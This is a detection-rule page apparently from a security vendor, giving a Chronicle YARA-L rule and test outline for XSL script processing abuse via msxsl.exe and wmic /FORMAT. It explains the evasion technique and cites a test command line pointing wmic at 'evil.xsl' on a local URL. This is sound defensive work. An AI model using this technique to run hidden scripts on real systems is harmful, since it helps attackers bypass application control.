T1220 Google Chronicle · YARA-L

Detect XSL Script Processing in Google Chronicle

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1220 XSL Script Processing
Canonical reference
https://attack.mitre.org/techniques/T1220/

YARA-L Detection Query

Google Chronicle (YARA-L)
yaral 
rule t1220_xsl_script_processing {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects T1220 XSL Script Processing via msxsl.exe execution or wmic.exe /FORMAT abuse (Squiblytwo). Both vectors proxy arbitrary script execution through trusted Windows tooling."
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1220"
    severity = "HIGH"
    confidence = "HIGH"
    created = "2026-04-13"
    platform = "Windows"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    $e.principal.hostname = $hostname
    $e.target.process.command_line = $cmdline

    (
      // msxsl.exe execution — any invocation
      re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`)

      or

      // wmic.exe with /FORMAT targeting XSL/remote URLs (Squiblytwo)
      (
        re.regex($e.target.process.file.full_path, `(?i)wmic\.exe$`)
        and
        re.regex($e.target.process.command_line, `(?i)/format`)
        and
        (
          re.regex($e.target.process.command_line, `(?i)\.xslt?`) or
          re.regex($e.target.process.command_line, `(?i)https?://`) or
          re.regex($e.target.process.command_line, `(?i)ftp://`)
        )
      )
    )

  match:
    $hostname over 5m

  outcome:
    $risk_remote = if(
      re.regex($cmdline, `(?i)(https?://|ftp://|\\\\\\\\)`), 1, 0
    )
    $risk_arbitrary_ext = if(
      re.regex($cmdline, `(?i)\.(jpeg|jpg|png|gif|txt|dat|bin|log)\s`), 1, 0
    )
    $is_squiblytwo = if(
      re.regex($e.target.process.file.full_path, `(?i)wmic\.exe$`) and
      re.regex($cmdline, `(?i)/format`), 1, 0
    )
    $technique_variant = if(
      re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`) and
      re.regex($cmdline, `(?i)(https?://|ftp://|\\\\\\\\)`),
      "msxsl-remote-xsl",
      if(
        re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`) and
        re.regex($cmdline, `(?i)\.(jpeg|jpg|png|gif|txt|dat|bin|log)\s`),
        "msxsl-arbitrary-ext",
        if(
          re.regex($e.target.process.file.full_path, `(?i)msxsl\.exe$`),
          "msxsl-local-xsl",
          if(
            $is_squiblytwo = 1 and
            re.regex($cmdline, `(?i)(https?://|ftp://)`),
            "squiblytwo-remote",
            "squiblytwo-local"
          )
        )
      )
    )

  condition:
    $e
}
high severity high confidence

Chronicle YARA-L 2.0 rule detecting T1220 XSL Script Processing. Matches PROCESS_LAUNCH events for msxsl.exe (any invocation, with enrichment for remote loads and arbitrary extensions) and wmic.exe with /FORMAT targeting XSL/XSLT files or remote URLs. Outcome variables classify technique variant and risk indicators.

Data Sources

Google Chronicle UDMWindows endpoint telemetry via Chronicle forwarderSysmon via Chronicle ingestion

Required Tables

PROCESS_LAUNCH UDM events

False Positives & Tuning

  • Enterprise XML processing pipelines that legitimately invoke msxsl.exe for XSLT transformations on internal file servers accessed via UNC paths
  • System administrators running wmic.exe /FORMAT with organization-approved XSL stylesheets for WMI data formatting
  • Software deployment frameworks that drop and execute msxsl.exe as part of an XML-driven installation workflow
Download portable Sigma rule (.yml)

Other platforms for T1220

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1msxsl.exe Local XSL Script Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing test.xml and test.xsl. Sysmon Event ID 7: Image Load for jscript.dll loaded by msxsl.exe, confirming JScript engine activation. Sysmon Event ID 1: Child process whoami.exe spawned by msxsl.exe (or WScript.Shell). Sysmon Event ID 11: File creation events for test.xml and test.xsl.

  2. Test 2msxsl.exe Same-File Argument Evasion

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine showing the same filename appearing twice (e.g., 'selfref.xsl selfref.xsl'). Sysmon Event ID 7: Image Load for jscript.dll by msxsl.exe. Sysmon Event ID 11: File creation for selfref.xsl.

  3. Test 3Squiblytwo — wmic /FORMAT Remote XSL Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and 'http://127.0.0.1:19823/evil.xsl'. Sysmon Event ID 3: Network Connection attempt from wmic.exe to 127.0.0.1:19823 (connection refused, but event is logged). Sysmon Event ID 22: DNS query if a hostname is used instead of IP.

  4. Test 4Squiblytwo — wmic /FORMAT Local XSL File

    Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and the %TEMP% path to wmic_test.xsl. Sysmon Event ID 7: jscript.dll loaded by wmic.exe. Sysmon Event ID 11: File creation for wmic_test.xsl.

  5. Test 5msxsl.exe Arbitrary Extension Masking

    Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing '.jpeg' file extensions instead of .xsl. Sysmon Event ID 7: jscript.dll loaded by msxsl.exe. Sysmon Event ID 11: File creation events for data.jpeg and style.jpeg.

Last updated: 2026-04-13 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1220 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1218System Binary Proxy ExecutionT1218.010Regsvr32T1047Windows Management InstrumentationT1127Trusted Developer Utilities Proxy ExecutionT1059.007JavaScriptT1059.005Visual BasicT1105Ingress Tool TransferT1027Obfuscated Files or InformationT1566.001Spearphishing AttachmentT1204.002Malicious File

Same Tactic: Defense Evasion

Popular Detections